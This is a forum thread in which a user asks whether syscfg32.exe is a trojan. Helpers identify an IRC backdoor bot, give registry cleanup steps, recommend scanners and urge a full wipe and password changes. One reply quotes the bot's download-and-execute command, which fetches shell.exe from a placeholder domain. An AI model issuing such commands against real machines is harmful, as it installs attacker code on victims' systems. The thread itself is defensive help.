Syscfg32.exe trojan??

[Daniel-Man]

Hi, my syscfg32.exe keeps loading up at startup and staying in the background? could this be some kind of trojan? the file is here, attached, in txt format. I have got AVG viruscann updated and spybot so I dunno why they wouldn't have picked the file up if it was bad?

Revolution By Definition: The Day Microsoft Falls To A Competitor

{Attachment removed by mod}

[YODA74]

This is part of a trojan that takes partial control of your PC and then uses it to spoof DNS servers, etc. Delete it from your hard drive and any references in the registry... and uninstall Kazaa. It seems to happen mostly to people who install that spyware ridden filth of a file sharing program. The trojan is called Backdoor-AHI

AND DO NOT PASTE ATTATCHMENTS TO FILES that are trojans

[Daniel-Man]

Hi. I had just uninstalled kazza with that kazaa removing program. Does anyone know why my virus scanner or bot scanner didnt pickup this backdoor file syscfg32.exe ? That probably explains why my firewall has shown 2649 intrusions, 269 highly serious since installation a few weeks ago!! It may also explain why i have sometimes received strange syscfg32.exe errors and lots of blue screens. Yoda how did u find out that file was a backdoor? At the moment syscfg32.exe is still running on my comp and wont show up when I do control alt delete so I guess its hidden. I'll have to restart in safe mode and delete the file. I have uninstalled it from my startup list of programs at the moment. It had called itself Configuration Manager in the description bit. I have attached a jpg screenshot of the programs running at startup at the moment. Can u tell me if they are all safe and not backdoors, etc.
Also, with my firewall it seems to detect two internet connections!! I have a network card but it has never been connected so I dont think that it is. I'm still wondering what the other connection thing is!! I included a screenshot of that too.
Regards,

[Daniel-Man]

soz, here are the attached screenshots

[Daniel-Man]

it seems the screenshot files are too big to attach.
so I'll just write the ones i'm unsure of.

PROGRAM FILENAME

LoadPowerprofile rundll32.exe, pwrprof.dll, loadcurrentpwrscheme
(one in Run)
LoadPowerprofile rundll32.exe, pwrprof.dll, loadcurrentpwrscheme
(one in Runservices)
LoadQM loadqm.exe
Quicktime task c:\windows\system\qttask.exe -atboottime
ScanRegistry c:\windows\scanregw.exe /autorun
Scheduling agent mstask.exe
Systemtray systray.exe
taskmonitor c:\windows\taskmon.exe


as for The two IPs on my firewall that are being detected as trusted internet servers are 203.173.252.0/255.255.0.0 (which I think is my Ihug ISP), and the other that comes up which I dont know what it is, is: 169.254.0.0/255.255.0.0

[YODA74]

You need to get rid of this completely so Click Start, and click Run. The Run dialog box appears.
Type regedit and then click OK. The Registry Editor opens.
Navigate to the key

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run

In the right pane, delete the following value:

Configuration Loader syscfg32.exe

Navigate to the following key

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\RunServices

In the right pane, delete the value

Configuration Loader syscfg32.exe

Exit the Registry Editor.
This should reverse the changes that the trojan made
Make sure you back up the regestry first


These are usually from IRC channels make sure your not connecting using port 6667


those run.dll really shouldn't be running unless you have a program accessing them????? stop everything from running in the back ground and see what is accessing them. everything else looks normal? run a tracert on those ISP see who they are..

[mjc]

Get HiJackthis from the links in my sig and run it, post that log and then run start up list (config => tools => startuplist...in HJT) and post that log too....if it is not showing up in TaskMan the yes it is running hidden, and you probably won't find everythin connected to it.

Also you may want to grab one of the anti trojan scanners, give Trojan Hunter a shot (it has a free trial period).

169.254.0.0 is special purpose IP, probably a nameserver

Also, zip a copy of the syscfg32 file and PM me, I can probably get it added to Spybot.

[kriptokool]

daniel that is a bot used for ddos it can be name any way from syscfg32.exe to iexplorer.exe (I'ma pretty sure I know which one you have cause thats the default name )its very very easy to make it go pass undetected by the AV. noramlly around 14-60kb depends if they packed it with UPX its not spyware or something like that.. since that bot doesn't have the ability to grant access to your HD but.. it does have a download and execute feautre so Once your bot is connected to an IRC channel the Bot creator just does .netinfo and sees your real IP and then .download http://domian.com/shell.exe and he can intall anything he wants..

[mjc]

Ok, this is very likely related to your problem of last week

http://www.pcguide.com/vb/showthread...ghlight=Hijack

Or these from the previous few weeks

http://www.pcguide.com/vb/showthread...threadid=17585

http://www.pcguide.com/vb/showthread...threadid=19011

http://www.pcguide.com/vb/showthread...threadid=19021

In which you were warned many times that you could possibly be infected with something.

I asked you several times in those threads to post a log from Startup list or Hijack This, which you haven't done. If you want to get rid of this thing then please be a little more co-operative. Like kriptokool implied, this could be just the tip of the iceberg.

At this point I would wipe your hard drive (no, not reinstalling, but actually using a program that will write zeros or random data to the entire drive surface, usually sevearl times). Discarding any and all floppies that have been created on your machine in at least the last month, any that have not been write protected when inserted into the drive, all CDs you have beurned in the same time period (actually I would go back 1 month before the problems started and get rid of everything upto the present). Then reinstall from factory CDs the OS, and AV. Then change all your passwords, EVERYWHERE, if you have done any online purchases, change all your credit cards, and any banking info, also changing your phone number is not a bad idea either.

In simplest terms...you've been own3d.

[Daniel-Man]

Ok. First of all my IRC does connect to port 6667. Also, I hadn't made a list of my startup things with hijack this because I didn't know how to use it. Regarding downloading trojan hunter, somebody said just try updating Spybot instead because those programs do the same thing. Included in this post is syscfg32.exe zipped, as MJC requested. And the next reply will contain the startup logs zipped. Regarding bank purchases online, etc, we dont purchase anything on the net. I do check my bank balance on www.anz.com.au which seems to be highly encryptive and secure but that is all.

Revolution By Definition: The Day Microsoft Falls To A Competitor

[Daniel-Man]

here is the other logs attached file. Also I was wondering, can these hackers get through a firewall if my firewall automatically blocks all these kinds of hacker attempts? Also, I'm on dialup and I was wondering how this hacker could repeadetively find my IP address, as it changes everytime I dialup again? The other question i had is, if I want to reformat my hard big time like mjc said, how could I backup 82 Gigs of data that I want to put back on later? Most is mp3 albums.

Revolution By Definition: The Day Microsoft Falls To A Competitor

[Daniel-Man]

I was just wondering too, is there any programs with decrypt the computer language data in exe files, or any files, so it can be read in english?

[Budfred]

Once you let a trojan in, it doesn't have to find you again, it connects with its maker when you log on the web. You have given it permission to be there is some way, like using Kazaa, and it then has full access to your system.

As for backing up your files.... there are a number of different ways to do so. However, if you do so, you are risking carrying whatever infection you have over to your clean install, thus starting the whole process over again. You may be better off writing off your collection and starting over with good security in place next time.

Budfred

[Daniel-Man]

Budfred, are you saying if I have opened the trojan I can't block his port attempts? My firewall logs show outgoing attempts to access files syscfg32.exe and something called Microsoft QMgr, both going to almost the same IP 203.109.250.50:53 and 203.109.250.61:53 were blocked by my firewall. If the firewall says it blocked these connections how can they get through? Going back to the actual trojan file does anyone know if something named Microsoft QMgr is a trojan too? I'm very sure the outcome will be that it is a trojan.

[YODA74]

does anyone know if something named Microsoft QMgr

not a trojan as you would think but it is a daemon responsible for
downloading the advertising graphics and copy used by MSN Messenger.I also believe this also shows up as "loadqm.exe" which is an application which runs constant checks for updates to MSIE 6 (presumably to help it crash more reliably) and for the MSN IM messenger.


BUT at this point and the seriousness of this I would stop and do what mjc suggested wipe the drive with a zero righting program and start all over...This has gone to far and it would be a nightmare to try and fix this now....

[ranchdog]

Nightmare....

Isn't the word for this one. Sir, the approach you
are taking is similar to patching a broken back with a
band-aid.

Please take mjc's advice on this one.

We have all had to bite the bullet once or twice.


Luck.


RD.

[mjc]

At this point those logs look pretty clean, but there is one troublesome line in the hijack log.

F0-system.ini: Shell=

That line has been changed, there should be something listed and if it is explorer, then it wouldn't show up.

[Daniel-Man]

mjc --> what do u mean by? At this point those logs look pretty clean, but there is one troublesome line in the hijack log. F0-system.ini: Shell= ?? what does this line mean? also no-one answered this question before: I was just wondering too, is there any programs with decrypt the computer language data in exe files, or any files, so it can be read in english? What is the best way to backup data? I think I may know someone who can backup data on a jazz drives, etc, so I can backup my mp3s and important documents on them then wipe everything else

[Daniel-Man]

MJC - I just looked at my system.ini file. It says shell=explorer.exe

[Daniel-Man]

does anyone know how to cancel Netbios over TCP/IP in network settings? I tried to but it was all greyed out and I couldnt uncheck the box. Also, MJC what happens when a person connects to IRC on port 6667? What other port can I use?

[Ghost_Hacker]

decrypt the computer language data in exe files, or any files, so it can be read in english?

You would need a "disassembler" ,like w32dasm,that can turn the digital "goobly-gook" of an exe file into assembler code. Also hex editors can pickout text messages embedded in files if there is any.

does anyone know how to cancel Netbios over TCP/IP in network settings?

Disabling "file and print sharing" is all that is needed. Some Windows OSes will still leave the netbios ports open if this is done, but they will not answer netbios calls. (You might be able to hack this in the registry, but I have never seen any reason to go that far.)


EDIT I forgot to add that you should also remove "client for..." if your not networking your computer with other Windows boxes.


Hope this helps

[mjc]

then the HijackThis log just dropped the rest of the line, because the way it looked there was no shell.

And the logs look clean now, so it looks like you got everything, but there is still a chance that passwords and what not have been grabbed, you can look at you ZA log and see if it blocked the sysconfig from accessing the internet.

[Daniel-Man]

I looked at my startup list after being connected to the net for 5.5 hours tonight and there were 6 open apps called WinOldAp which where the file winoa386.mod in c:\windows\system. I'll send u the logs cause theres some apps I'm not sure about, also in my firewall log of tonight there were about 30 UDP port probes from a hacker, using different proxy IPs I think, but no programs such as syscfg32.exe. When I went to update my TheCleaner Active program, according to my logs it connected to what I think was the hacker, also with liveupdate.exe and another outgoing connection with ZoneAlarmPro these seem to have gone to the hacker too, i dont think zone alarm pro was logging properly so I clicked full log and I'll send u tomorrows one.

[mjc]

Well for that winoldap and winoa386.mod, check this out....

http://www.computerhope.com/issues/ch000456.htm

[Daniel-Man]

To everyone in this thread: I think the source of my problems I have had for two/three years, which I have posted threads about are all from this one source. I found thousands of registry entries relating to shells and other malicious hacks in my registry and since three days ago I've spent 20 hours a day editing and analysing .dll files, hidden files, renamed fake files, and others. MJC said it best, I have been Owned like nothing I have ever seen before. From my knowledge I have discovered hacked virus scanner files (AVG), all hacked anti-trojan scanners: trojan hunter, spybot, pest patrol, The cleaner, Swatit, even my firewall has been hacked, all these anti-trojan things were hacked so that this hacker's registry entries etc could not be detected or cleaned. All the installation files were hacked too so if I reinstalled it it would do the same. I had my old windows directory which was also hacked too so that if I overwrote DLLs from the old dir to the new nothing would happen. With the somewhat little use that pest patrol I think it might've picked up things when I analyzed a file one by one. By doing that I discovered thousands of 007 Password grabbing files, which were created by the hacker and renamed to hidden fake dlls, exes, dats, and even .sav , saved game files. It's unbelievable. I found logs of nearly everything which my computer had done, from opening start menu icons, programs, installing software, bootups, sites I'd been to, deleted files, sent emails, etc. And after all this time spent trying to analyze and edit the files which the hacker hacked I've learned that this hacker is either very advanced, and the hacking would've taken maybe a year doing the file editing, uploading, registry editing, uploading, which is possible, or he used many .reg files to automatically enter shell data into the registry. I don't know exactly what shells are but I thought they were something like xdcc bots in mIRC where users can download music and stuff from. This makes sense seeing I have approx 62GB of high quality albums of many genres on two hard drives. I guess the hacker initially got through a backdoor of my computer, past the virus scanners through a file. The question I would like to know is how did he upload the file? I had a few cracks which I'd stupidly downloded of the internet to make trial version software work so I guess it could've been from that. My options now: I'm gathering my mp3s into a folder, along with precious work files of my parents, and some txt files, wav files and jpg files which I have edited and analysed their modified dates to make sure they have not been hacked, then I am going to take my computer to a technician friend, store the precious files on there, then totally format my two hard drives. Could the hacker have hacked into my BIOS? Also, can .jpg, .txt, .wav, .mp3 files be hacked? I'm definitely not copying any .dll, .exe., .bat, .com, .sys, or any other file types than I have specified earlier.

Trust No One